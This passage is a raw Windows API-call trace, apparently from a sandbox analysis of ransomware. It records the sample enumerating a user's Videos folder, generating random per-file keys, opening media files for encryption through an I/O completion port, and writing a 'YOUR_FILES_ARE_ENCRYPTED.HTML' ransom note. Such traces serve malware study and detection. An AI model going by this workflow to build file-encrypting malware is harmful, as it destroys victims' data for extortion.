lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\*" [0168.840] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b79520, ftCreationTime.dwHighDateTime=0x1d7ddbf, ftLastAccessTime.dwLowDateTime=0xb9336740, ftLastAccessTime.dwHighDateTime=0x1d7e09d, ftLastWriteTime.dwLowDateTime=0xb9336740, ftLastWriteTime.dwHighDateTime=0x1d7e09d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0168.841] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b79520, ftCreationTime.dwHighDateTime=0x1d7ddbf, ftLastAccessTime.dwLowDateTime=0xb9336740, ftLastAccessTime.dwHighDateTime=0x1d7e09d, ftLastWriteTime.dwLowDateTime=0xb9336740, ftLastWriteTime.dwHighDateTime=0x1d7e09d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0168.841] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b9a5160, ftCreationTime.dwHighDateTime=0x1d7e115, ftLastAccessTime.dwLowDateTime=0x77de1f80, ftLastAccessTime.dwHighDateTime=0x1d7e5eb, ftLastWriteTime.dwLowDateTime=0x77de1f80, ftLastWriteTime.dwHighDateTime=0x1d7e5eb, nFileSizeHigh=0x0, nFileSizeLow=0xb8b3, dwReserved0=0x0, dwReserved1=0x60, cFileName="BQ2mqjFOjzf.swf", cAlternateFileName="BQ2MQJ~1.SWF")) returned 1 [0168.841] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\BQ2mqjFOjzf.swf") returned 91 [0168.841] lstrcmpW (lpString1="BQ2mqjFOjzf.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.841] PathFindExtensionW (pszPath="BQ2mqjFOjzf.swf") returned=".swf" [0168.841] lstrlenW (lpString=".swf") returned 4 [0168.841] PathFindExtensionW (pszPath="BQ2mqjFOjzf.swf") returned=".swf" [0168.841] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69a396f0, ftCreationTime.dwHighDateTime=0x1d7d8c3, ftLastAccessTime.dwLowDateTime=0x90a036d0, ftLastAccessTime.dwHighDateTime=0x1d7db04, ftLastWriteTime.dwLowDateTime=0x90a036d0, 
ftLastWriteTime.dwHighDateTime=0x1d7db04, nFileSizeHigh=0x0, nFileSizeLow=0x12143, dwReserved0=0x0, dwReserved1=0x60, cFileName="c8Ep8C79JgsBT9QX4q.mkv", cAlternateFileName="C8EP8C~1.MKV")) returned 1 [0168.841] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\c8Ep8C79JgsBT9QX4q.mkv") returned 98 [0168.841] lstrcmpW (lpString1="c8Ep8C79JgsBT9QX4q.mkv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.841] PathFindExtensionW (pszPath="c8Ep8C79JgsBT9QX4q.mkv") returned=".mkv" [0168.841] lstrlenW (lpString=".mkv") returned 4 [0168.841] PathFindExtensionW (pszPath="c8Ep8C79JgsBT9QX4q.mkv") returned=".mkv" [0168.841] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1792aa90, ftCreationTime.dwHighDateTime=0x1d7e1bf, ftLastAccessTime.dwLowDateTime=0x8f1d8a10, ftLastAccessTime.dwHighDateTime=0x1d7e239, ftLastWriteTime.dwLowDateTime=0x8f1d8a10, ftLastWriteTime.dwHighDateTime=0x1d7e239, nFileSizeHigh=0x0, nFileSizeLow=0x11985, dwReserved0=0x0, dwReserved1=0x60, cFileName="CEqDre8Jxqkiwy.avi", cAlternateFileName="CEQDRE~1.AVI")) returned 1 [0168.841] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CEqDre8Jxqkiwy.avi") returned 94 [0168.841] lstrcmpW (lpString1="CEqDre8Jxqkiwy.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.841] PathFindExtensionW (pszPath="CEqDre8Jxqkiwy.avi") returned=".avi" [0168.841] lstrlenW (lpString=".avi") returned 4 [0168.841] PathFindExtensionW (pszPath="CEqDre8Jxqkiwy.avi") returned=".avi" [0168.841] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.842] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CEqDre8Jxqkiwy.avi" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\ff3anzodeddnbufszh\\y0dahssstbia\\ceqdre8jxqkiwy.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c8 [0168.843] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=72069) returned 1 [0168.843] GetProcessHeap () returned 0x270000 [0168.843] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76b8ef8 [0168.846] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="40") returned 2 [0168.846] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="19") returned 2 [0168.846] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="4D") returned 2 [0168.846] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="75") returned 2 [0168.846] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="F1") returned 2 [0168.846] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="32") returned 2 [0168.846] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="EF") returned 2 [0168.846] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="FF") returned 2 [0168.846] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="11") returned 2 [0168.846] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="CC") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="8A") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="4C") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="4D") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="1B") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | 
out: param_1="02") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="A9") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="F1") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="7B") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="F0") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="41") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="A0") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="C6") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="CD") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="ED") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="0F") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="8B") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="49") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="66") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="44") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="D1") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="E0") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="1C") returned 2 [0168.848] lstrcpyW (in: lpString1=0x76c8fac, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CEqDre8Jxqkiwy.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CEqDre8Jxqkiwy.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CEqDre8Jxqkiwy.avi" 
[0168.848] CreateIoCompletionPort (FileHandle=0x5c8, ExistingCompletionPort=0x3a0, CompletionKey=0x76b8ef8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.848] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76b8ef8, lpOverlapped=0x76b8ef8) returned 1 [0168.848] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f360f0, ftCreationTime.dwHighDateTime=0x1d7e6e9, ftLastAccessTime.dwLowDateTime=0xb4cddbf0, ftLastAccessTime.dwHighDateTime=0x1d7e77c, ftLastWriteTime.dwLowDateTime=0xb4cddbf0, ftLastWriteTime.dwHighDateTime=0x1d7e77c, nFileSizeHigh=0x0, nFileSizeLow=0x9d0a, dwReserved0=0x0, dwReserved1=0x60, cFileName="CO4O ON4.flv", cAlternateFileName="CO4OON~1.FLV")) returned 1 [0168.848] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CO4O ON4.flv") returned 88 [0168.848] lstrcmpW (lpString1="CO4O ON4.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.848] PathFindExtensionW (pszPath="CO4O ON4.flv") returned=".flv" [0168.848] lstrlenW (lpString=".flv") returned 4 [0168.848] PathFindExtensionW (pszPath="CO4O ON4.flv") returned=".flv" [0168.848] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.848] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CO4O ON4.flv" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\ff3anzodeddnbufszh\\y0dahssstbia\\co4o on4.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d0 [0168.849] GetFileSizeEx (in: hFile=0x5d0, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=40202) returned 1 [0168.849] 
GetProcessHeap () returned 0x270000 [0168.849] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76e1050 [0168.852] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="B6") returned 2 [0168.852] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="30") returned 2 [0168.852] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="45") returned 2 [0168.852] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="B8") returned 2 [0168.852] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="F9") returned 2 [0168.852] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="37") returned 2 [0168.852] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="A3") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="B5") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="95") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="DF") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="57") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="C9") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="DF") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="31") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="53") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="55") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="45") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="D9") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="12") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="00") returned 2 [0168.853] wsprintfW (in: 
param_1=0x4ebd46e, param_2="%02X" | out: param_1="36") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="C0") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="02") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="8E") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="19") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="3A") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="8B") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="0C") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="42") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="3B") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="60") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="69") returned 2 [0168.854] lstrcpyW (in: lpString1=0x76f1104, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CO4O ON4.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CO4O ON4.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CO4O ON4.flv" [0168.854] CreateIoCompletionPort (FileHandle=0x5d0, ExistingCompletionPort=0x3a0, CompletionKey=0x76e1050, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.854] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76e1050, lpOverlapped=0x76e1050) returned 1 [0168.854] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca45cd0, ftCreationTime.dwHighDateTime=0x1d7da35, 
ftLastAccessTime.dwLowDateTime=0x2c8d1920, ftLastAccessTime.dwHighDateTime=0x1d7dfb8, ftLastWriteTime.dwLowDateTime=0x2c8d1920, ftLastWriteTime.dwHighDateTime=0x1d7dfb8, nFileSizeHigh=0x0, nFileSizeLow=0x14870, dwReserved0=0x0, dwReserved1=0x60, cFileName="o7CtnS.mkv", cAlternateFileName="")) returned 1 [0168.854] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\o7CtnS.mkv") returned 86 [0168.854] lstrcmpW (lpString1="o7CtnS.mkv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.854] PathFindExtensionW (pszPath="o7CtnS.mkv") returned=".mkv" [0168.854] lstrlenW (lpString=".mkv") returned 4 [0168.854] PathFindExtensionW (pszPath="o7CtnS.mkv") returned=".mkv" [0168.854] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ef2720, ftCreationTime.dwHighDateTime=0x1d7d9bc, ftLastAccessTime.dwLowDateTime=0x21124df0, ftLastAccessTime.dwHighDateTime=0x1d7e214, ftLastWriteTime.dwLowDateTime=0x21124df0, ftLastWriteTime.dwHighDateTime=0x1d7e214, nFileSizeHigh=0x0, nFileSizeLow=0xd07e, dwReserved0=0x0, dwReserved1=0x60, cFileName="xa_lhgCiG.avi", cAlternateFileName="XA_LHG~1.AVI")) returned 1 [0168.854] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\xa_lhgCiG.avi") returned 89 [0168.855] lstrcmpW (lpString1="xa_lhgCiG.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.855] PathFindExtensionW (pszPath="xa_lhgCiG.avi") returned=".avi" [0168.855] lstrlenW (lpString=".avi") returned 4 [0168.855] PathFindExtensionW (pszPath="xa_lhgCiG.avi") returned=".avi" [0168.855] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.855] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\xa_lhgCiG.avi" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\ff3anzodeddnbufszh\\y0dahssstbia\\xa_lhgcig.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d4 [0168.855] GetFileSizeEx (in: hFile=0x5d4, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=53374) returned 1 [0168.855] GetProcessHeap () returned 0x270000 [0168.855] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x77091a8 [0168.859] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="AB") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="56") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="1E") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="BB") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="34") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="4A") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="FD") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="7B") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="B9") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="8F") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="64") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="79") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="FA") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="3C") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: 
param_1="8C") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="04") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="BE") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="57") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="48") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="BF") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="64") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="BE") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="4D") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="CD") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="4B") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="A5") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="82") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="6C") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="C5") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="57") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="83") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="27") returned 2 [0168.860] lstrcpyW (in: lpString1=0x771925c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\xa_lhgCiG.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\xa_lhgCiG.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\xa_lhgCiG.avi" [0168.860] 
CreateIoCompletionPort (FileHandle=0x5d4, ExistingCompletionPort=0x3a0, CompletionKey=0x77091a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.860] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x77091a8, lpOverlapped=0x77091a8) returned 1 [0168.860] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b0ad170, ftCreationTime.dwHighDateTime=0x1d7d80e, ftLastAccessTime.dwLowDateTime=0x7b2c7030, ftLastAccessTime.dwHighDateTime=0x1d7d842, ftLastWriteTime.dwLowDateTime=0x7b2c7030, ftLastWriteTime.dwHighDateTime=0x1d7d842, nFileSizeHigh=0x0, nFileSizeLow=0x1741e, dwReserved0=0x0, dwReserved1=0x60, cFileName="XM0Taz9.mkv", cAlternateFileName="")) returned 1 [0168.861] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\XM0Taz9.mkv") returned 87 [0168.861] lstrcmpW (lpString1="XM0Taz9.mkv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.861] PathFindExtensionW (pszPath="XM0Taz9.mkv") returned=".mkv" [0168.861] lstrlenW (lpString=".mkv") returned 4 [0168.861] PathFindExtensionW (pszPath="XM0Taz9.mkv") returned=".mkv" [0168.861] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b0ad170, ftCreationTime.dwHighDateTime=0x1d7d80e, ftLastAccessTime.dwLowDateTime=0x7b2c7030, ftLastAccessTime.dwHighDateTime=0x1d7d842, ftLastWriteTime.dwLowDateTime=0x7b2c7030, ftLastWriteTime.dwHighDateTime=0x1d7d842, nFileSizeHigh=0x0, nFileSizeLow=0x1741e, dwReserved0=0x0, dwReserved1=0x60, cFileName="XM0Taz9.mkv", cAlternateFileName="")) returned 0 [0168.861] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0168.861] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" 
| out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0168.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\ff3anzodeddnbufszh\\y0dahssstbia\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0168.862] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0168.864] CloseHandle (hObject=0x4a8) returned 1 [0168.864] GetProcessHeap () returned 0x270000 [0168.865] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ab480 | out: hHeap=0x270000) returned 1 [0168.865] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b79520, ftCreationTime.dwHighDateTime=0x1d7ddbf, ftLastAccessTime.dwLowDateTime=0xb9336740, ftLastAccessTime.dwHighDateTime=0x1d7e09d, ftLastWriteTime.dwLowDateTime=0xb9336740, ftLastWriteTime.dwHighDateTime=0x1d7e09d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff399580, dwReserved1=0xffffffff, cFileName="y0DAHsSstBIa", cAlternateFileName="Y0DAHS~1")) returned 0 [0168.865] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0168.865] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: 